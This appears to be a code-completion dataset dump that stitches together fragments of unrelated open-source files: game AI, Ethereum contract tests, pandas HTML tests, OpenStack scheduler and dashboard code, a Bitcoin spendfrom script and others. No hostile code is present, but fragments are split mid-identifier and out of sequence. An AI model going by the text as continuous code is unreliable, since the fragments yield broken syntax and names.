fyabc/MiniGames
|
HearthStone2/MyHearthStone/ai/standard.py
|
Python
|
mit
| 265 | 0 |
#! /usr/bin/python
# -*- coding:
|
utf-8 -*-
from . import agent
# Import them to register agents.
from .rule_based import basic
__author__ = 'fyabc'
def get_agent_by_name(name):
return agent.Agent.AgentClasses[name]
_
|
_all__ = [
'get_agent_by_name',
]
|
AugurProject/augur-core
|
tests/libraries/test_reentrancy_guard.py
|
Python
|
gpl-3.0
| 855 | 0.005848 |
#!/usr/bin/env python
from ethereum.tools import tester
from ethereum.tools.tester import TransactionFailed
from pytest import fixture, mark, raises
@fixture(scope='session')
def testerSnapshot(sessionFixture):
sessionFixture.uploadAndAddToController('solidity_test_helpers/ReentrancyGuardHelper.sol')
ReentrancyGuardHelper = sessionFixture.contracts['ReentrancyGuardHelper']
return sessionFixture.createSnapshot()
@fixture
def testerContractsFixture(sessionFixture, testerSnapshot):
sessionFixture.resetToSnapshot(testerSnapshot)
return sessionFixture
def test
|
_nonReentrant(testerContractsFixture):
ReentrancyGuardHelper = testerContractsFixture.contracts['ReentrancyGuardHelper']
assert ReentrancyGuardHe
|
lper.testerCanReentrant()
with raises(TransactionFailed):
ReentrancyGuardHelper.testerCanNotReentrant()
|
phobson/bokeh
|
bokeh/command/__init__.py
|
Python
|
bsd-3-clause
| 340 | 0.005882 |
''' P
|
rovides a command line application for Bokeh.
The following subcommands are available:
'''
from __future__ import absolute_import
def _build_docstring():
global __doc__
from . import subcommands
for cls in subcommands.all:
__doc__ += "%8s : %s\n" % (cls.name, cls.help)
_build_docstring()
del _build_do
|
cstring
|
CartoDB/bigmetadata
|
tests/us/census/test_lodes.py
|
Python
|
bsd-3-clause
| 423 | 0.004728 |
'''
Test ACS columns
'''
from tasks.u
|
til import shell
# TODO clean this up in a more general init script
try:
shell('createdb test')
except:
pass
from nose.tools import with_setup
from tasks.us.census.lodes import WorkplaceAreaCharacteristicsColumns
from tests.util import runt
|
ask, setup, teardown
@with_setup(setup, teardown)
def test_wac_columns_run():
runtask(WorkplaceAreaCharacteristicsColumns())
|
datapythonista/pandas
|
pandas/tests/io/test_html.py
|
Python
|
bsd-3-clause
| 40,117 | 0.000773 |
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg =
|
r"\{" + flavor + r"\} is not
|
a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows
|
CiscoSystems/nova-solver-scheduler
|
nova/scheduler/solvers/constraints/num_instances_constraint.py
|
Python
|
apache-2.0
| 2,244 | 0.001337 |
# Copyright (c) 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler.solvers import constraints
CONF = cfg.CONF
CONF.import_opt("max_instances_per_host",
"nova.scheduler.filters.num_instances_filter")
LOG = logging.getLogger(__name__)
class NumInstancesConstraint(constraints.BaseLinearConstraint):
"""Constraint that specifies the maximum number of instances that
each host can launch.
"""
def _generate_components(self
|
, variables, hosts, filter_properties):
num_hosts = len(hosts)
num_instances = filter_properties.get('num_instances')
var_matrix = variables.host_instance_matrix
max_instances = CONF.max_instances_per_host
for i in xrange(num_hosts):
num_host_instances = hosts[i].num_instances
|
acceptable_num_instances = int(max_instances - num_host_instances)
if acceptable_num_instances < 0:
acceptable_num_instances = 0
if acceptable_num_instances < num_instances:
for j in xrange(acceptable_num_instances, num_instances):
self.variables.append([var_matrix[i][j]])
self.coefficients.append([1])
self.constants.append(0)
self.operators.append('==')
LOG.debug(_("%(host)s can accept %(num)s requested instances "
"according to NumInstancesConstraint."),
{'host': hosts[i],
'num': acceptable_num_instances})
|
justasabc/kubernetes-ubuntu
|
ke/images/python/backup/backup_cluster.py
|
Python
|
apache-2.0
| 4,855 | 0.036663 |
class Cluster:
"""
a cluster has N simulators
"""
def __init__(self,region_pool):
self.region_pool = region_pool
self.filepath = CLUSTER_DATA_DIR+"cluster"
# simulator list
self.simulator_list = []
def get_simulator_list(self):
return self.simulator_list
def get_simulator_count(self):
return len(self.simulator_list)
def add_simulator(self,sim):
self.simulator_list.append(sim)
def remove_simulator(self,sim):
self.simulator_list.remove(sim)
#====================================================================================
# get region name list
#====================================================================================
def __get_region_name_list(self,region_group,global_region_data):
#REGION_NAME_HUYU=["huyu"+str(x)+str(y) for x in range(4) for y in range(7)]
wh = global_region_data[region_group]["wh"]
xmax = wh[0]
ymax = wh[1]
region_name_list = ["{0}{1}{2}".format(region_group,x,y) for x in range(xmax) for y in range(ymax)]
return region_name_list
#====================================================================================
# init cluster
#====================================================================================
def init_cluster(self):
if os.path.exists(self.filepath):
print "[Cluster] read cluster data from {0}...".format(self.filepath)
self.__read_cluster_data(self.filepath)
else:
print "[Cluster] create default cluster for the first time..."
self.__create_default_cluster()
print "[Cluster] save cluster data to {0}...".format(self.filepath)
self.__save_cluster_data(self.filepath)
def __new_simulator_name(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return "default"
return "sim{0}".format(sim_count+1)
def __new_simulator_port(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return SIM_START_PORT
|
return SIM_START_PORT+(sim_count+1)
#==============================================
|
======================================
# create default cluster
#====================================================================================
def __create_default_cluster(self):
self.simulator_list = []
region_pool = self.region_pool
global_region_data = self.region_pool.get_global_region_data()
# huyu
region_group="huyu"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
huyu_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
huyu_sim.create_simulator_xml_file()
self.add_simulator(huyu_sim)
# xwd
region_group="xwd"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
xwd_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
xwd_sim.create_simulator_xml_file()
self.add_simulator(xwd_sim)
# newregion
region_group="newregion"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
#region_name_list = self.__get_region_name_list("newregion",global_region_data)
region_name_list = self.__get_region_name_list(region_group,global_region_data)
#region_name_list = ["newregion00","newregion01"]
new_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
new_sim.create_simulator_xml_file()
self.add_simulator(new_sim)
print huyu_sim.get_region_port_list()
print xwd_sim.get_region_port_list()
print new_sim.get_region_port_list()
# copy xml files to minions
cmd = UtilityCommander()
cmd.copy_region_xml_to_minions(MINIONS)
def __save_cluster_data(self,filepath):
with open(filepath,'w') as f:
for sim in self.simulator_list:
line = sim.str()+"\n"
f.write(line)
def __read_cluster_data(self,filepath):
for line in open(filepath,'r'):
sim = self.__read_simulator(line)
self.add_simulator(sim)
#====================================================================================
# read simulator from simulator string
#====================================================================================
def __read_simulator(self,simulator_str):
parts = simulator_str.rstrip("\n").split(",")
sim_name = parts[0]
sim_port = int(parts[1])
region_name_list = parts[2:]
# create simulator
sim = Simulator(sim_name,sim_port,self.region_pool,region_name_list)
return sim
def start(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
#sim_pod.start()
def stop(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
sim_pod.stop()
|
Geoportail-Luxembourg/qgis-pag-plugin
|
widgets/stylize/stylize.py
|
Python
|
mit
| 2,046 | 0.012219 |
'''
Created on 22 sept. 2015
@author: arxit
'''
import os
from qgis.core import *
from PyQt4.QtCore import QCoreApplication
import PagLuxembourg.main
class StylizeProject(object):
'''
Main class for the layers stylize widget
'''
def __init__(self):
'''
Constructor
'''
pass
def run(self):
'''
Runs the widget
'''
project = PagLuxembourg.main.current_project
if not project.isPagProject():
return
# Map layers in the TOC
maplayers = QgsMapLayerRegistry.instance().mapLa
|
yers()
# Iterates through XSD types
for type in PagLuxembourg.main.xsd_schema.types:
if type.geometry_type is None:
continue
uri = project.getTypeUri(type)
found = False
# Check whether a layer with type data source exists in the map
for k,v in maplayers.iteritems():
if project.compareUR
|
Is(v.source(), uri):
found = True
layer = v
break
if not found:
continue
self.stylizeLayer(layer, type)
PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('StylizeProject','Success'),
QCoreApplication.translate('StylizeProject','The layers styling is finished.'))
def stylizeLayer(self, layer, type):
'''
Stylize the current layer
:param layer: The layer to update
:type layer: QgsVectorLayer
:param type: XSD schema type
:type type: PAGType
'''
qml = os.path.join(PagLuxembourg.main.plugin_dir,
'styles',
'{}.qml'.format(type.name))
layer.loadNamedStyle(qml)
|
markovmodel/PyEMMA
|
pyemma/coordinates/transform/tica.py
|
Python
|
lgpl-3.0
| 11,423 | 0.004465 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3
|
of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If no
|
t, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
"False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
|
DavidSantamaria/Om
|
contrib/spendfrom/spendfrom.py
|
Python
|
mit
| 10,053 | 0.005968 |
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19230 if testnet else 9230
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outpu
|
ts = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
potential_
|
inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount
|
zouyapeng/horizon-newtouch
|
openstack_dashboard/dashboards/identity/groups/tables.py
|
Python
|
apache-2.0
| 7,450 | 0 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.groups import constants
LOG = logging.getLogger(__name__)
LOGOUT_URL = 'logout'
STATUS_CHOICES = (
("true", True),
("false", False)
)
class CreateGroupLink(tables.LinkAction):
name = "create"
verbose_name = _("Create Group")
url = constants.GROUPS_CREATE_URL
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("identity", "identity:create_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class EditGroupLink(tables.LinkAction):
name = "edit"
verbose_name = _("Edit Group")
url = constants.GROUPS_UPDATE_URL
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:update_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class DeleteGroupsAction(tables.DeleteAction):
name = "delete"
data_type_singular = _("Group")
data_type_plural = _("Groups")
policy_rules = (("identity", "identity:delete_group"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
def delete(self, request, obj_id):
LOG.info('Deleting group "%s".' % obj_id)
api.keystone.group_delete(request, obj_id)
class ManageUsersLink(tables.LinkAction):
name = "users"
verbose_name = _("Modify Users")
url = constants.GROUPS_MANAGE_URL
icon = "pencil"
policy_rules = (("identity", "identity:get_group"),
("identity", "identity:list_users"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
class GroupFilterAction(tables.FilterAction):
def filter(self, table, groups, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
